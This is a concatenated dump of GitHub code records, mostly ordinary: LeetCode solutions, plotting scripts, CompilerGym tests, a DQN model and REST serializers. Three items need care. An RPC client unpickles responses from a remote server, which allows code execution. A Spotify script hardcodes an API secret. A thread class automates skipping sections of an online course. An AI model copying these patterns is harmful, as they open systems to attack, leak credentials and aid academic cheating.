result\n","repo_name":"airflow-plugins/autopilot_plugin","sub_path":"operators/autopilot_to_s3_operator.py","file_name":"autopilot_to_s3_operator.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891100748","text":"from collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n bfs = deque([root])\n level, ans = 0, 0\n max_sum = float('-inf')\n while bfs:\n level += 1\n curr_sum = 0\n for _ in range(len(bfs)):\n node = bfs.popleft()\n if node.left:\n bfs.append(node.left)\n if node.right:\n bfs.append(node.right)\n curr_sum += node.val\n if curr_sum > max_sum:\n max_sum = curr_sum\n ans = level\n return ans","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/maximum_level_sum_of_a_binary_tree_1161.py","file_name":"maximum_level_sum_of_a_binary_tree_1161.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72883279612","text":"# -*- coding: utf-8 -*-\nfrom hackcqooc.core import Core\n\nimport threading\nimport logging\nfrom time import sleep\n\n\nclass skipper(threading.Thread):\n \"\"\"用于执行跳过课程任务的线程类\"\"\"\n\n def __init__(self, core: Core, sectionList: list) -> None:\n \"\"\"参数说明:\n *core* 功能内核对象,来自src.core\n *sectionList* 包含课程ID的字符串列表\n \"\"\"\n threading.Thread.__init__(self)\n self.core = core\n self.sectionList = sectionList\n self.success = 0\n self.fail = 0\n self.current = 1\n self.state = False\n\n def run(self) -> None:\n logging.info(\"skip thread started\")\n self.skip(self.sectionList)\n\n def skip(self, sectionList: list) -> None:\n logging.info(\"skip task started\")\n for i in sectionList:\n result = self.core.skip_section(i)\n if result[\"code\"] == 200:\n self.success += 1\n else:\n self.fail += 1\n # 对于任务列表长度为1的情况就没有必要sleep这么久了,\n # 只有长度超过1的才要分别sleep 31秒\n if len(sectionList) != 1:\n sleep(31)\n self.current += 1\n # 跳出循环说明任务执行完成,修改状态标志位为True\n self.state = True\n\n def getState(self) -> bool:\n \"\"\"返回True说明任务执行完成,False为未完成\"\"\"\n return 
self.state\n","repo_name":"Fatpandac/fuck_cqooc","sub_path":"src/skipper.py","file_name":"skipper.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"78"} +{"seq_id":"19088629339","text":"import EMDA_Utilities as utils\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# switch to root directory\r\nos.chdir(\"../\")\r\n\r\n# Path to the data to be imported\r\ncsv_path = \"data_release/caiso/caiso_rto_genmix.csv\"\r\n\r\n# read RTO-wide LMP data for CAISO using provided utility script\r\n[dates, types, data] = utils.read_genmix(csv_path)\r\n\r\n# findout what are the type of fuels in this RTO\r\nfuel_types = list(set(types))\r\nprint(\"The type of fuels are:\")\r\nprint(fuel_types)\r\nnum_fuel_type = len(fuel_types)\r\n# count the capacity of each type of fuel\r\ngen_ct = [0] * num_fuel_type\r\n\r\n# solar capacity of each day\r\nsolar_output = []\r\n\r\n# iterate through each entry to aggregate data\r\nfor i in range(len(dates)):\r\n # fuel type of this entry\r\n gen_type = types[i]\r\n type_ind = fuel_types.index(gen_type)\r\n # mean of capacity of that day for that fuel type\r\n gen_capacity = np.sum(data[i,:])\r\n gen_ct[type_ind] += gen_capacity\r\n\r\n # check if fuel is solar, if yes then append to solar container\r\n if gen_type == 'solar':\r\n solar_output.append(gen_capacity)\r\n\r\n# draw a bar plot of each type of fuel \r\nplt.bar(fuel_types,gen_ct)\r\nplt.title('Annual Capacity of Each Fuel Type in CAISO')\r\nplt.show()\r\n\r\n# plot the trend of solar energy over this entire dataset\r\nplt.plot(solar_output)\r\nplt.title('Daily Output of Solar in CAISO')\r\nplt.show()\r\n","repo_name":"tamu-engineering-research/COVID-EMDA","sub_path":"startup/example_gemix.py","file_name":"example_gemix.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"37425444744","text":"from pickle import loads\r\nfrom pickle import dumps\r\nfrom pickle import UnpicklingError\r\nfrom aiohttp import ClientSession\r\nfrom aiohttp import ClientError\r\nfrom typing import Any\r\n\r\n\r\nclass RPC:\r\n\r\n RPC_SERVER = \"http://deepthreads.ru\"\r\n PICKLE_PROTOCOL = 4\r\n\r\n @classmethod\r\n async def _rpc(cls, func: str, *args, **kwargs) -> Any:\r\n async with ClientSession(base_url=cls.RPC_SERVER) as session:\r\n data = dumps((args, kwargs), protocol=cls.PICKLE_PROTOCOL)\r\n try:\r\n response = loads(\r\n await (await session.post(f\"/rpc?func={func}&v={cls.PICKLE_PROTOCOL}\", data=data)).read()\r\n )\r\n if isinstance(response, tuple) and response[0] == \"e\":\r\n raise Exception(f\"RPC error ({response[1]}). 
{response[2]}\")\r\n except UnpicklingError:\r\n raise ValueError(f\"Cannot unpickle response from the RPC server.\")\r\n except ClientError:\r\n raise ConnectionError(f\"Cannot send request to the RPC server.\")\r\n return response\r\n\r\n @classmethod\r\n async def generate_request_signature(cls, path: str, headers: dict, body: bytes) -> str:\r\n return await cls._rpc(\"projz_generate_request_signature\", path, headers, body)\r\n\r\n @classmethod\r\n async def generate_device_id(cls, installation_id: str) -> str:\r\n return await cls._rpc(\"projz_generate_device_id\", installation_id)\r\n\r\n @classmethod\r\n async def generate_smid(cls, organization: str, platform: str, version: str, model: str, app_id: str):\r\n return await cls._rpc(\"projz_generate_smid\", organization, platform, version, model, app_id)\r\n\r\n @classmethod\r\n async def generate_wallet_recovery_data(cls, strength: int, language: str) -> tuple[str, str]:\r\n return await cls._rpc(\"projz_generate_wallet_recovery_data\", strength, language)\r\n","repo_name":"Sparta403/ProjectZd","sub_path":"ProjectZPlus/api/control/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16033356995","text":"#!/usr/bin/python3\n\nimport requests\nimport argparse\nfrom random import randint\n\n\nparser = argparse.ArgumentParser(description=\"Show, random or specific, indiehacker's quotes\")\nparser.add_argument('-m', '--max_random', metavar='N', type=int,\n help='max value of random range', default=1500)\nparser.add_argument('-n', '--number_of_quotes', metavar='N', type=int,\n help='number of quotes to show', default=1)\n\nparser.add_argument('-q', '--quote', metavar='QUOTE_INDEX', type=int,\n help='get quote identified by index QUOTE', default=None)\n\n\n\nBASE_URL = 'https://indie-hackers.firebaseio.com/loadingQuotes/{}.json'\n\n\n\ndef render_quote(quote):\n\n if quote is None:\n print(\"Quote not found. 
Probably this one does not exists.\")\n return\n\n header_str = 'Quote: #%s' % quote['quote_index']\n print(\"\\n%s\\n%s\" % (header_str, '='*len(header_str)))\n print(\"\\\"%s\\\"\" % quote['quote'])\n print(\"\\n%s, %s - %s\" %(quote['author'], quote['company'], quote['mrr']))\n print(\"%s\\n\" %(quote['url']))\n\n\ndef get_quote(quote_index):\n\n url_req = BASE_URL.format( quote_index )\n res = None\n\n # send request\n r = requests.get(url = url_req)\n data = r.json()\n\n if data is not None:\n\n quote = data['quote']\n quote_url = data.get('url', '----')\n\n byline = data['byline']\n components = byline.split('of')\n author = components[0].rstrip()\n round_bracket_index = components[1].find('(')\n company = components[1][0: round_bracket_index - 1]\n mrr = components[1][round_bracket_index +1 : -1]\n\n res = dict()\n\n res['quote'] = quote\n res['author'] = author\n res['company'] = company\n res['mrr'] = mrr\n res['quote_index'] = quote_index\n res['url'] = quote_url\n\n return res\n\n\ndef get_random_quote(max_quote):\n\n data = None\n random_quote_index = None\n res = dict()\n\n max_range = max_quote\n\n # while you can't find a valid quote search randomly\n while True :\n # the max value should get from somewhere\n random_quote_index = randint(0, max_range)\n\n data = get_quote(random_quote_index)\n if data is not None:\n break\n # the range is too big so adjust max value\n # with the current random value\n max_range = random_quote_index\n\n return data\n\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n\n if args.quote is not None:\n quote = get_quote(args.quote)\n render_quote(quote)\n else:\n\n for i in range(0, args.number_of_quotes):\n quote = get_random_quote(args.max_random)\n render_quote(quote)\n\n","repo_name":"Cereal84/indie-hackers-quotes","sub_path":"indiequotes.py","file_name":"indiequotes.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"1058231911","text":"from numbers import Real\n\nimport gym\nimport numpy as np\nimport pytest\n\nimport compiler_gym\nfrom compiler_gym.envs import CompilerEnv, mlir\nfrom compiler_gym.envs.mlir import MlirEnv\nfrom compiler_gym.service.connection import CompilerGymServiceConnection\nfrom compiler_gym.spaces import (\n ActionSpace,\n Box,\n Dict,\n Discrete,\n NamedDiscrete,\n Permutation,\n Scalar,\n SpaceSequence,\n)\nfrom compiler_gym.spaces import Tuple as TupleSpace\nfrom compiler_gym.wrappers.mlir import convert_action, make_mlir_rl_wrapper_env\nfrom tests.test_main import main\n\npytest_plugins = [\"tests.pytest_plugins.common\", \"tests.pytest_plugins.mlir\"]\n\n\n@pytest.fixture(scope=\"function\", params=[\"local\", \"service\"])\ndef env(request) -> CompilerEnv:\n \"\"\"Create an MLIR environment.\"\"\"\n if request.param == \"local\":\n with gym.make(\"mlir-v0\") as env:\n yield env\n else:\n service = CompilerGymServiceConnection(mlir.MLIR_SERVICE_BINARY)\n try:\n with MlirEnv(service=service.connection.url) as env:\n yield env\n finally:\n service.close()\n\n\ndef test_service_version(env: MlirEnv):\n assert env.version == compiler_gym.__version__\n\n\ndef test_compiler_version(env: MlirEnv):\n assert env.compiler_version.startswith(\"LLVM 14.\")\n\n\ndef test_action_spaces_names(env: MlirEnv):\n assert {a.name for a in env.action_spaces} == {\"MatrixMultiplication\"}\n\n\ndef test_action_space(env: MlirEnv):\n expected_action_space = ActionSpace(\n SpaceSequence(\n name=\"MatrixMultiplication\",\n 
size_range=[1, 4],\n space=Dict(\n name=None,\n spaces={\n \"tile_options\": Dict(\n name=None,\n spaces={\n \"interchange_vector\": Permutation(\n name=None,\n scalar_range=Scalar(name=None, min=0, max=2, dtype=int),\n ),\n \"tile_sizes\": Box(\n name=None,\n low=np.array([1] * 3, dtype=int),\n high=np.array([2**32] * 3, dtype=int),\n dtype=np.int64,\n ),\n \"promote\": Scalar(\n name=None, min=False, max=True, dtype=bool\n ),\n \"promote_full_tile\": Scalar(\n name=None, min=False, max=True, dtype=bool\n ),\n \"loop_type\": NamedDiscrete(\n name=None,\n items=[\"loops\", \"affine_loops\"],\n ),\n },\n ),\n \"vectorize_options\": Dict(\n name=None,\n spaces={\n \"vectorize_to\": NamedDiscrete(\n name=None,\n items=[\"dot\", \"matmul\", \"outer_product\"],\n ),\n \"vector_transfer_split\": NamedDiscrete(\n name=None,\n items=[\"none\", \"linalg_copy\", \"vector_transfer\"],\n ),\n \"unroll_vector_transfers\": Scalar(\n name=None,\n min=False,\n max=True,\n dtype=bool,\n ),\n },\n ),\n },\n ),\n )\n )\n assert expected_action_space == env.action_space\n\n\ndef test_set_observation_space_from_spec(env: MlirEnv):\n env.observation_space = env.observation.spaces[\"Runtime\"]\n obs = env.observation_space\n\n env.observation_space = \"Runtime\"\n assert env.observation_space == obs\n\n\ndef test_set_reward_space_from_spec(env: MlirEnv):\n env.reward_space = env.reward.spaces[\"runtime\"]\n reward = env.reward_space\n\n env.reward_space = \"runtime\"\n assert env.reward_space == reward\n\n\ndef test_mlir_rl_wrapper_env_action_space(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n tile_size = NamedDiscrete(\n name=None,\n items=[\"1\", \"2\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\", \"256\", \"512\", \"1024\"],\n )\n expected_subspace = Dict(\n name=None,\n spaces={\n \"tile_options\": Dict(\n name=None,\n spaces={\n \"interchange_vector\": Discrete(name=None, n=6),\n \"tile_sizes\": TupleSpace(\n name=None, spaces=[tile_size, tile_size, tile_size]\n ),\n \"promote\": NamedDiscrete(name=None, items=[\"False\", \"True\"]),\n \"promote_full_tile\": NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n ),\n \"loop_type\": NamedDiscrete(\n name=None,\n items=[\"loops\", \"affine_loops\"],\n ),\n },\n ),\n \"vectorize_options\": Dict(\n name=None,\n spaces={\n \"vectorize_to\": NamedDiscrete(\n name=None, items=[\"dot\", \"matmul\", \"outer_product\"]\n ),\n \"vector_transfer_split\": NamedDiscrete(\n name=None,\n items=[\"none\", \"linalg_copy\", \"vector_transfer\"],\n ),\n \"unroll_vector_transfers\": NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n ),\n },\n ),\n },\n )\n assert action_space[0] == expected_subspace\n for i in range(1, 4):\n assert action_space[i][\"is_present\"] == NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n )\n assert action_space[i][\"space\"] == expected_subspace\n\n\ndef test_convert_action():\n action = [\n {\n \"tile_options\": {\n \"interchange_vector\": 5,\n \"tile_sizes\": [1, 3, 9],\n \"promote\": 1,\n \"promote_full_tile\": 0,\n \"loop_type\": 1,\n },\n \"vectorize_options\": {\n \"vectorize_to\": 2,\n \"vector_transfer_split\": 1,\n \"unroll_vector_transfers\": 1,\n },\n },\n {\"is_present\": 0},\n ]\n converted_action = convert_action(action)\n\n expected_action = [\n {\n \"tile_options\": {\n \"interchange_vector\": np.array([2, 1, 0], dtype=int),\n \"tile_sizes\": [2, 8, 512],\n \"promote\": True,\n \"promote_full_tile\": False,\n \"loop_type\": 1,\n },\n \"vectorize_options\": 
{\n \"vectorize_to\": 2,\n \"vector_transfer_split\": 1,\n \"unroll_vector_transfers\": True,\n },\n }\n ]\n\n assert len(converted_action) == len(expected_action)\n assert len(converted_action[0]) == len(expected_action[0])\n assert len(converted_action[0][\"tile_options\"]) == len(\n expected_action[0][\"tile_options\"]\n )\n assert len(converted_action[0][\"vectorize_options\"]) == len(\n expected_action[0][\"vectorize_options\"]\n )\n\n\ndef test_mlir_rl_wrapper_env_observation_space(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n observation_space = wrapper_env.observation_space\n assert observation_space == Box(\n name=\"Runtime\", shape=[1], low=0, high=np.inf, dtype=float\n )\n\n\ndef test_mlir_rl_wrapper_env_step(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n action_space.seed(123)\n action = action_space.sample()\n print(action)\n observation, reward, done, _ = wrapper_env.step(action)\n assert isinstance(observation, np.ndarray)\n assert np.array_equal(observation.shape, [1])\n assert observation[0] > 0\n assert isinstance(reward, Real)\n assert observation[0] == -reward\n assert isinstance(done, bool)\n assert done\n\n\ndef test_mlir_rl_wrapper_env_reset(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n action_space.seed(123)\n observation = wrapper_env.reset()\n assert isinstance(observation, np.ndarray)\n assert np.array_equal(observation.shape, [1])\n assert observation[0] == 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookresearch/CompilerGym","sub_path":"tests/mlir/mlir_env_test.py","file_name":"mlir_env_test.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","stars":821,"dataset":"github-code","pt":"78"} +{"seq_id":"32324295588","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport unittest\nimport sqlite3\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport re\nimport requests\n\n# Create database and set up cursor and connection\ndef setUpDatabase(db_name):\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+db_name)\n cur = conn.cursor()\n return cur, conn\n\n# Create Songs table to add to if it does not exist\ndef createTables(cur,conn):\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS Songs\n (id INTEGER PRIMARY KEY UNIQUE, name TEXT, year INTEGER, duration INTEGER)\"\"\")\n\n conn.commit()\n\n# Go through 25 data items given a given index and year\ndef collectData(sp, year, index):\n end = index + 25\n results = sp.search(q=f'year:{year}',type='track', limit=50)\n data_l = []\n # print(results)\n for track in results['tracks']['items'][index:end]:\n # print(track)\n name = track[\"name\"].strip()\n duration = track[\"duration_ms\"]\n year = int(track['album'][\"release_date\"][:4].strip())\n data_l.append((name,year,duration))\n\n return data_l\n\n# update the Songs table with 25 pieces of collected data\ndef updateMainTable(cur,conn,data_l):\n for data in data_l:\n # print(formatted_data)\n\n cur.execute(\"\"\"INSERT OR IGNORE INTO Songs (name, year, duration) VALUES (?,?,?)\n \"\"\",(data))\n\n conn.commit()\n\n\n\ndef main():\n # Create connection to spotify API with spotipy\n sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(client_id=\"9e43dbbe8a254c218b7cc2aec2dc1d2b\",\n client_secret=\"2567b0ec45c14442a2bfc6ea3446b5e3\"))\n cur, conn = setUpDatabase(\"final.db\")\n createTables(cur, 
conn)\n \n # Prompt user for input until a valid one is entered or -1 is entered to stop program without adding\n # Also keeps track of index to use and year to search\n while True:\n try:\n user_year = int(input(\"\"\"Please input a year between 2001 and 2022 to add 25 songs from (type \"-1\" to end code). \"\"\"))\n if user_year == -1:\n (\"Ending Program\")\n return None\n if user_year > 2000 and user_year < 2023:\n amount_from_year = cur.execute(\"\"\"SELECT year FROM Songs WHERE\n year = (?)\"\"\",(user_year,)).fetchall()\n # print(amount_from_year)\n index = len(amount_from_year)\n if index > 25:\n print(\"You have the maximum data for this year, choose another please\")\n else:\n year = user_year\n break\n else:\n print(\"Invalid Year, please try again\")\n except:\n print(1)\n print(\"Invalid Year, please try again\")\n\n data_l = collectData(sp, year, index)\n # data_l = collectData(api_key, 2018, 0)\n # print(data_l)\n\n updateMainTable(cur,conn,data_l)\n\n\n\n pass\n\n\n\nmain()","repo_name":"viraux/206-Final","sub_path":"music_data.py","file_name":"music_data.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37498136746","text":"#PE116\r\n\"\"\"\r\nVoir description PE114\r\n\"\"\"\r\n\r\ndef fact(n):\r\n p = 1\r\n for i in range(2, n+1):\r\n p *= i\r\n return p\r\n\r\ndef C_n_k(n, k):\r\n return fact(n)//(fact(k)*fact(n-k))\r\n\r\n\r\ndef F(m, Ltot):\r\n arr = 0 #1\r\n # Boucle sur le nombre de segments rouges\r\n for k in range(1, (Ltot)//(m)+1):\r\n lr = m * k\r\n #Arr = arrangements du noir\r\n # nombre de positions de cases parmi les cases restantes + cases rouges\r\n arr += C_n_k(Ltot - lr + k, k)\r\n return arr\r\n\r\nLtot = 50\r\na = F(2,Ltot)\r\nb = F(3,Ltot)\r\nc = F(4,Ltot)\r\n\r\nprint(a, b, c)\r\nprint(\"TOTAL = \", a+b+c)\r\n","repo_name":"lenaindelaforetmagique/ProjectEuler","sub_path":"Python/PE116.py","file_name":"PE116.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15881850880","text":"from rest_framework import serializers\n\nfrom extras.models import IXAPI, JobResult, Webhook\nfrom peering_manager.api import BaseModelSerializer, ContentTypeField\nfrom users.api.nested_serializers import NestedUserSerializer\n\nfrom .nested_serializers import *\n\n__all__ = (\n \"JobResultSerializer\",\n \"WebhookSerializer\",\n \"NestedJobResultSerializer\",\n \"NestedWebhookSerializer\",\n)\n\n\nclass IXAPISerializer(BaseModelSerializer):\n class Meta:\n model = IXAPI\n fields = [\"id\", \"display\", \"name\", \"url\", \"api_key\", \"api_secret\", \"identity\"]\n\n\nclass IXAPICustomerSerializer(serializers.Serializer):\n url = serializers.CharField()\n api_key = serializers.CharField()\n api_secret = serializers.CharField()\n\n\nclass JobResultSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"extras-api:jobresult-detail\")\n user = NestedUserSerializer(read_only=True)\n obj_type = ContentTypeField(read_only=True)\n output = serializers.CharField(read_only=True)\n\n class Meta:\n model = JobResult\n fields = [\n \"id\",\n \"url\",\n \"created\",\n \"completed\",\n \"name\",\n \"obj_type\",\n \"status\",\n \"user\",\n \"data\",\n \"job_id\",\n \"output\",\n ]\n\n\nclass WebhookSerializer(serializers.ModelSerializer):\n class Meta:\n model = Webhook\n fields = [\n \"id\",\n \"name\",\n \"type_create\",\n 
\"type_update\",\n \"type_delete\",\n \"url\",\n \"enabled\",\n \"http_method\",\n \"http_content_type\",\n \"secret\",\n \"ssl_verification\",\n \"ca_file_path\",\n ]\n","repo_name":"maznu/peering-manager","sub_path":"extras/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"35244912041","text":"import sys\nfrom collections import deque\nsys.setrecursionlimit(10**6)\ninput = sys.stdin.readline\n\n\ndef dfs(i):\n visited[i] = 1\n for j in g[i]:\n if not visited[j]:\n dfs(j)\n stack.append(i)\n\n\ndef dfs_rev(i):\n global cnt\n ans = cash[i]\n visited[i] = cnt\n for j in gr[i]:\n if not visited[j]:\n ans += dfs_rev(j)\n return ans\n\n\ndef dfs_cash(i):\n global dp\n if dp[i] == -1:\n temp = 0\n for j in g_scc[i]:\n temp = max(temp, dfs_cash(j))\n if temp == 0 and not r_scc[i]:\n dp[i] = 0\n else:\n dp[i] = sums[i] + temp\n return dp[i]\n\n\n# input\nn, m = map(int, input().split())\n\ng = [[] for _ in range(n + 1)]\ngr = [[] for _ in range(n + 1)]\nfor _ in range(m):\n a, b = map(int, input().split())\n g[a].append(b)\n gr[b].append(a)\n\ncash = [0] + [int(input()) for _ in range(n)]\ns, p = map(int, input().split())\nrestaurant = list(map(int, input().split()))\n\n# Kosaraju's algorithm\ncnt = 0\nstack = []\nvisited = [0] * (n + 1)\nfor i in range(1, n + 1):\n if not visited[i]:\n cnt += 1\n dfs(i)\n\ncnt = 0\nvisited = [0] * (n + 1)\nsums = []\nfor i in reversed(stack):\n if not visited[i]:\n cnt += 1\n sums.append(dfs_rev(i))\n\n# graph between sccs\ng_scc = [set() for _ in range(cnt)]\nr_scc = [0] * cnt\nfor i in range(1, n + 1):\n for j in g[i]:\n if visited[i] != visited[j]:\n g_scc[visited[i] - 1].add(visited[j] - 1)\n if i in restaurant:\n r_scc[visited[i] - 1] = 1\n\n# search\ndp = [-1] * cnt\nprint(dfs_cash(visited[s] - 1))\n","repo_name":"lapis42/boj","sub_path":"boj4013_atm_scc.py","file_name":"boj4013_atm_scc.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2321644206","text":"from app import app\nimport concurrent.futures\nimport datetime\nimport itertools\nimport lxml\nimport lxml.html\nimport requests\nfrom urlparse import urljoin\n\n\ndef fix_url(url):\n \"\"\"Fixes anomalous URL paths\n :param url: the url to fix\n \"\"\"\n return \"http://\" + url if \"://\" not in url else url\n\n\ndef scrape(page, rows_xpath, mapping, next_xpath=None, stop_condition=None):\n \"\"\"Function to scrape data from web pages\n :param page: the page to scrape\n :param rows_xpath: the xpath to the target data that needs scraping\n :param mapping: parameter to supply a dictionary containing the mapping of\n scraped data to keywords\n :param next_xpath: the xpath to the target page's \"next page\" button\n :param stop_condition: parameter to supply a boolean stop condition\n \"\"\"\n try:\n while page:\n document = lxml.html.fromstring(requests.get(page).text)\n\n for row in document.xpath(rows_xpath):\n item = {key: value(row) for key, value in mapping.items()}\n\n yield item\n\n if stop_condition and stop_condition(row, item):\n return\n\n if next_xpath:\n next_links = document.xpath(next_xpath)\n page = urljoin(page, next_links[\n 0]) if next_links else None\n\n else:\n page = None\n\n except requests.ConnectionError:\n # catch connection errors\n app.logger.warning('connection error: scraping [{}]'.format(str(page)))\n\n except requests.HTTPError:\n 
# catch htp errors\n app.logger.warning('http error: scraping [{}]'.format(str(page)))\n\n except Exception:\n # catch any other exception for debugging purposes\n app.logger.critical(\"error: scraping [{}]\".format(str(page)))\n\ndef scrape_source(config):\n \"\"\"Function to scrape data from malware sources\"\"\"\n return list(itertools.chain(*concurrent.futures.ThreadPoolExecutor(5).map(\n lambda args: scrape(*args), config)))\n\n\nif __name__ == '__main__':\n ''''''\n","repo_name":"team-miv/miv-tracker","sub_path":"feeder/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"44922544813","text":"import numpy as np\nimport tensorflow as tf\n\n\nclass DQN(object):\n def __init__(self, env, args):\n self.env = env\n self.args = args\n\n self.hidden_size = self.args.get('hidden_size', 32)\n self.num_actions = self.env.action_space.n\n self.num_states = self.env.observation_space.shape[0]\n\n self._add_ops()\n self.policy()\n self.build_train()\n self.update_target()\n self.build_train_op()\n\n def _add_ops(self):\n self.state = tf.placeholder(tf.float32, shape=(None, self.num_states), name='state')\n self.action = tf.placeholder(tf.int32, [None], name='action')\n self.reward = tf.placeholder(tf.float32, [None], name='reward')\n self.next_state = tf.placeholder(tf.float32, shape=(None, self.num_states), name='next_state')\n self.done_mask = tf.placeholder(tf.float32, [None], name='done')\n\n self.stochastic = tf.placeholder(tf.bool, (), name='stochastic')\n self.update_epsion = tf.placeholder(tf.float32, (), name='update_epsion')\n\n def _get_qa_value(self, inputs, num_actions, scope='qa_value', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n latent = tf.layers.dense(inputs, units=64, activation=tf.tanh, name='fc1')\n # latent = tf.layers.dense(latent, units=64, activation=tf.tanh, name='fc2')\n action_scores = tf.layers.dense(latent, units=num_actions, activation=None)\n \n return action_scores\n\n def policy(self, scope='deepq', reuse=None):\n with tf.variable_scope(scope, reuse=reuse):\n eps = tf.get_variable('eps', (), initializer=tf.constant_initializer())\n\n q_values = self._get_qa_value(self.state, self.num_actions, scope=\"q_func\")\n deterministic_actions = tf.argmax(q_values, axis=1)\n\n batch_size = tf.shape(self.state)[0]\n random_actions = tf.random_uniform(tf.stack([batch_size]), minval=0, maxval=self.num_actions, dtype=tf.int64)\n chose_random = tf.random_uniform(tf.stack([batch_size]), minval=0, maxval=1, dtype=tf.float32) < eps\n stochastic_actions = tf.where(chose_random, random_actions, deterministic_actions)\n\n self.output_actions = tf.cond(self.stochastic, lambda: stochastic_actions, lambda: deterministic_actions)\n self.update_eps_expr = eps.assign(tf.cond(self.update_epsion >= 0, lambda: self.update_epsion, lambda: eps))\n\n def build_train(self, gamma=1.0, reuse=None):\n with tf.variable_scope('deepq', reuse=reuse):\n # q network evaluation\n q_t = self._get_qa_value(self.state, self.num_actions, scope=\"q_func\", reuse=True)\n self.q_func_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope=tf.get_variable_scope().name + \"/q_func\")\n\n # target q network evalution\n q_t1 = self._get_qa_value(self.next_state, self.num_actions, scope=\"target_q_func\")\n self.target_q_func_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope=tf.get_variable_scope().name + \"/target_q_func\")\n\n q_t_selected = 
tf.reduce_sum(q_t * tf.one_hot(self.action, self.num_actions), 1)\n q_t1_best = tf.reduce_max(q_t1, 1)\n q_t1_best_masked = (1.0 - self.done_mask) * q_t1_best\n q_t_selected_target = self.reward + gamma * q_t1_best_masked\n \n td_error = q_t_selected - tf.stop_gradient(q_t_selected_target)\n\n def huber_loss(x, delta=1.0):\n \"\"\"Reference: https://en.wikipedia.org/wiki/Huber_loss\"\"\"\n return tf.where(\n tf.abs(x) < delta,\n tf.square(x) * 0.5,\n delta * (tf.abs(x) - 0.5 * delta)\n )\n errors = huber_loss(td_error)\n self.loss = tf.reduce_mean(errors)\n\n def update_target(self):\n update_target_expr = []\n for var, var_target in zip(sorted(self.q_func_vars, key=lambda v: v.name), \n sorted(self.target_q_func_vars, key=lambda v: v.name)):\n update_target_expr.append(var_target.assign(var))\n self.update_target_params = tf.group(*update_target_expr)\n\n def build_train_op(self):\n optimizer = tf.train.AdamOptimizer(1e-3)\n grads_and_vars = optimizer.compute_gradients(self.loss, var_list=self.q_func_vars)\n self.train_op = optimizer.apply_gradients(grads_and_vars)\n\n def train_step(self, sess, batch):\n feed_dict = {\n self.state: batch[0],\n self.action: batch[1],\n self.reward: batch[2],\n self.next_state: batch[3],\n self.done_mask: batch[4]\n }\n _, loss = sess.run([self.train_op, self.loss], feed_dict)\n \n return loss\n\n def get_action(self, sess, state, rand=True, eps=-1):\n feed_dict = {\n self.state: np.reshape(state, (-1, self.num_states)),\n self.stochastic: rand,\n self.update_epsion: eps\n }\n action, _ = sess.run([self.output_actions, self.update_eps_expr], feed_dict)\n # action = sess.run(self.output_actions, feed_dict)\n\n return action[0]\n\n","repo_name":"kpsc/deep-reinforcement-learning","sub_path":"dqn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30029768563","text":"import timeit\n\nruns = 1000000\ntotal_time = 0\nfor _ in range(runs):\n start = timeit.default_timer() # these are laptop dependent, i.e. 
